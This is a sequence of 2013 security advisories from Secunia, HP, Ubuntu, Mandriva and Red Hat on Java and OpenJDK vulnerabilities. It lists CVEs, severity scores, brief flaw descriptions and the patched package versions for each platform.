EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03714148
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03714148 Version: 1
HPSBUX02857 SSRT101103 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
References: CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0169, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0431, CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0437, CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0444, CVE-2013-0445, CVE-2013-0446, CVE-2013-0449, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1484, CVE-2013-1485, CVE-2013-1486, CVE-2013-1487, CVE-2013-1489, CVE-2013-1493
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.04 and earlier
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0169 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-0431 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-0437 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2013-0444 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1484 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1485 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-1486 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1487 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1489 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities. The upgrade is available from the following location
http://www.hp.com/java
HP-UX B.11.23, B.11.31 JDK and JRE v7.0.05 or subsequent
MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.05 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.04.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 25 March 2013 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. ============================================================================ Ubuntu Security Notice USN-1724-1 February 14, 2013
openjdk-6, openjdk-7 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK.
Software Description: - openjdk-7: Open Source Java implementation - openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to cause a denial of service. (CVE-2012-1541, CVE-2012-3342, CVE-2013-0351, CVE-2013-0419, CVE-2013-0423, CVE-2013-0446, CVE-2012-3213, CVE-2013-0425, CVE-2013-0426, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0441, CVE-2013-0442, CVE-2013-0445, CVE-2013-0450, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478, CVE-2013-1480)
Vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. (CVE-2013-0409, CVE-2013-0434, CVE-2013-0438)
Several data integrity vulnerabilities were discovered in the OpenJDK JRE. (CVE-2013-0424, CVE-2013-0427, CVE-2013-0433, CVE-2013-1473)
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. (CVE-2013-0432, CVE-2013-0435, CVE-2013-0443)
A vulnerability was discovered in the OpenJDK JRE related to availability. An attacker could exploit this to cause a denial of service. (CVE-2013-0440)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to cause a denial of service. (CVE-2013-0444)
A data integrity vulnerability was discovered in the OpenJDK JRE. (CVE-2013-0448)
An information disclosure vulnerability was discovered in the OpenJDK JRE. (CVE-2013-0449)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to cause a denial of service. (CVE-2013-1481)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.10: icedtea-7-jre-jamvm 7u13-2.3.6-0ubuntu0.12.10.1 openjdk-7-jre 7u13-2.3.6-0ubuntu0.12.10.1 openjdk-7-jre-headless 7u13-2.3.6-0ubuntu0.12.10.1 openjdk-7-jre-lib 7u13-2.3.6-0ubuntu0.12.10.1 openjdk-7-jre-zero 7u13-2.3.6-0ubuntu0.12.10.1
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.12.04.2 icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.12.04.2 openjdk-6-jre 6b27-1.12.1-2ubuntu0.12.04.2 openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.12.04.2 openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.12.04.2 openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.12.04.2
Ubuntu 11.10: icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.11.10.2 icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.11.10.2 openjdk-6-jre 6b27-1.12.1-2ubuntu0.11.10.2 openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.11.10.2 openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.11.10.2 openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.11.10.2
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.10.04.2 openjdk-6-jre 6b27-1.12.1-2ubuntu0.10.04.2 openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.10.04.2 openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.10.04.2 openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.10.04.2
This update uses a new upstream release which includes additional bug fixes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2013:010 http://www.mandriva.com/security/
Package : java-1.6.0-openjdk Date : February 11, 2013 Affected: 2011., Enterprise Server 5.0
Problem Description:
Multiple security issues were identified and fixed in OpenJDK (icedtea6):
- S6563318, CVE-2013-0424: RMI data sanitization
- S6664509, CVE-2013-0425: Add logging context
- S6664528, CVE-2013-0426: Find log level matching its name or value given at construction time
- S6776941: CVE-2013-0427: Improve thread pool shutdown
- S7141694, CVE-2013-0429: Improving CORBA internals
- S7173145: Improve in-memory representation of splashscreens
- S7186945: Unpack200 improvement
- S7186946: Refine unpacker resource usage
- S7186948: Improve Swing data validation
- S7186952, CVE-2013-0432: Improve clipboard access
- S7186954: Improve connection performance
- S7186957: Improve Pack200 data validation
- S7192392, CVE-2013-0443: Better validation of client keys
- S7192393, CVE-2013-0440: Better Checking of order of TLS Messages
- S7192977, CVE-2013-0442: Issue in toolkit thread
- S7197546, CVE-2013-0428: (proxy) Reflect about creating reflective proxies
- S7200491: Tighten up JTable layout code
- S7200500: Launcher better input validation
- S7201064: Better dialogue checking
- S7201066, CVE-2013-0441: Change modifiers on unused fields
- S7201068, CVE-2013-0435: Better handling of UI elements
- S7201070: Serialization to conform to protocol
- S7201071, CVE-2013-0433: InetSocketAddress serialization issue
- S8000210: Improve JarFile code quality
- S8000537, CVE-2013-0450: Contextualize RequiredModelMBean class
- S8000540, CVE-2013-1475: Improve IIOP type reuse management
- S8000631, CVE-2013-1476: Restrict access to class constructor
- S8001235, CVE-2013-0434: Improve JAXP HTTP handling
- S8001242: Improve RMI HTTP conformance
- S8001307: Modify ACC_SUPER behavior
- S8001972, CVE-2013-1478: Improve image processing
- S8002325, CVE-2013-1480: Improve management of images
- Backports
- S7010849: 5/5 Extraneous javac source/target options when building sa-jdi
The updated packages provides icedtea6-1.11.6 which is not vulnerable to these issues. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFRGPy8mqjQ0CJFipgRAksKAJ4jLXf61F0/Cv73FU/q53MlN9XWrwCg31LS 66EZIS1nevIB2YwYzVsWp8I= =bxu7 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: java-1.7.0-openjdk security update Advisory ID: RHSA-2013:0247-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0247.html Issue date: 2013-02-08 CVE Names: CVE-2013-0424 CVE-2013-0425 CVE-2013-0426 CVE-2013-0427 CVE-2013-0428 CVE-2013-0429 CVE-2013-0431 CVE-2013-0432 CVE-2013-0433 CVE-2013-0434 CVE-2013-0435 CVE-2013-0440 CVE-2013-0441 CVE-2013-0442 CVE-2013-0443 CVE-2013-0444 CVE-2013-0445 CVE-2013-0450 CVE-2013-1475 CVE-2013-1476 CVE-2013-1478 CVE-2013-1480 =====================================================================
- Summary:
Updated java-1.7.0-openjdk packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
- Description:
These packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit.
Multiple improper permission check issues were discovered in the AWT, CORBA, JMX, Libraries, and Beans components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-0442, CVE-2013-0445, CVE-2013-0441, CVE-2013-1475, CVE-2013-1476, CVE-2013-0429, CVE-2013-0450, CVE-2013-0425, CVE-2013-0426, CVE-2013-0428, CVE-2013-0444)
Multiple flaws were found in the way image parsers in the 2D and AWT components handled image raster parameters. A specially-crafted image could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the virtual machine privileges. (CVE-2013-1478, CVE-2013-1480)
A flaw was found in the AWT component's clipboard handling code. An untrusted Java application or applet could use this flaw to access clipboard data, bypassing Java sandbox restrictions. (CVE-2013-0432)
The default Java security properties configuration did not restrict access to certain com.sun.xml.internal packages. An untrusted Java application or applet could use this flaw to access information, bypassing certain Java sandbox restrictions. This update lists the whole package as restricted. (CVE-2013-0435)
Multiple improper permission check issues were discovered in the JMX, Libraries, Networking, and JAXP components. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-0431, CVE-2013-0427, CVE-2013-0433, CVE-2013-0434)
It was discovered that the RMI component's CGIHandler class used user inputs in error messages without any sanitization. An attacker could use this flaw to perform a cross-site scripting (XSS) attack. (CVE-2013-0424)
It was discovered that the SSL/TLS implementation in the JSSE component did not properly enforce handshake message ordering, allowing an unlimited number of handshake restarts. A remote attacker could use this flaw to make an SSL/TLS server using JSSE consume an excessive amount of CPU by continuously restarting the handshake. (CVE-2013-0440)
It was discovered that the JSSE component did not properly validate Diffie-Hellman public keys. An SSL/TLS client could possibly use this flaw to perform a small subgroup attack. (CVE-2013-0443)
This erratum also upgrades the OpenJDK package to IcedTea7 2.3.5. Refer to the NEWS file, linked to in the References, for further information.
All users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393) 860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50) 906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52) 906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318) 906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068) 906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972) 906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977) 906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057) 906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325) 906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537) 907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29) 907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493) 907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952) 907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392) 907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509) 907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528) 907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235) 907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941) 907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071) 907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631) 907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066) 907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.src.rpm
i386: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.i386.rpm
x86_64: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.src.rpm
i386: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.i386.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.i386.rpm
x86_64: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.el6_3.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.i686.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.el6_3.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
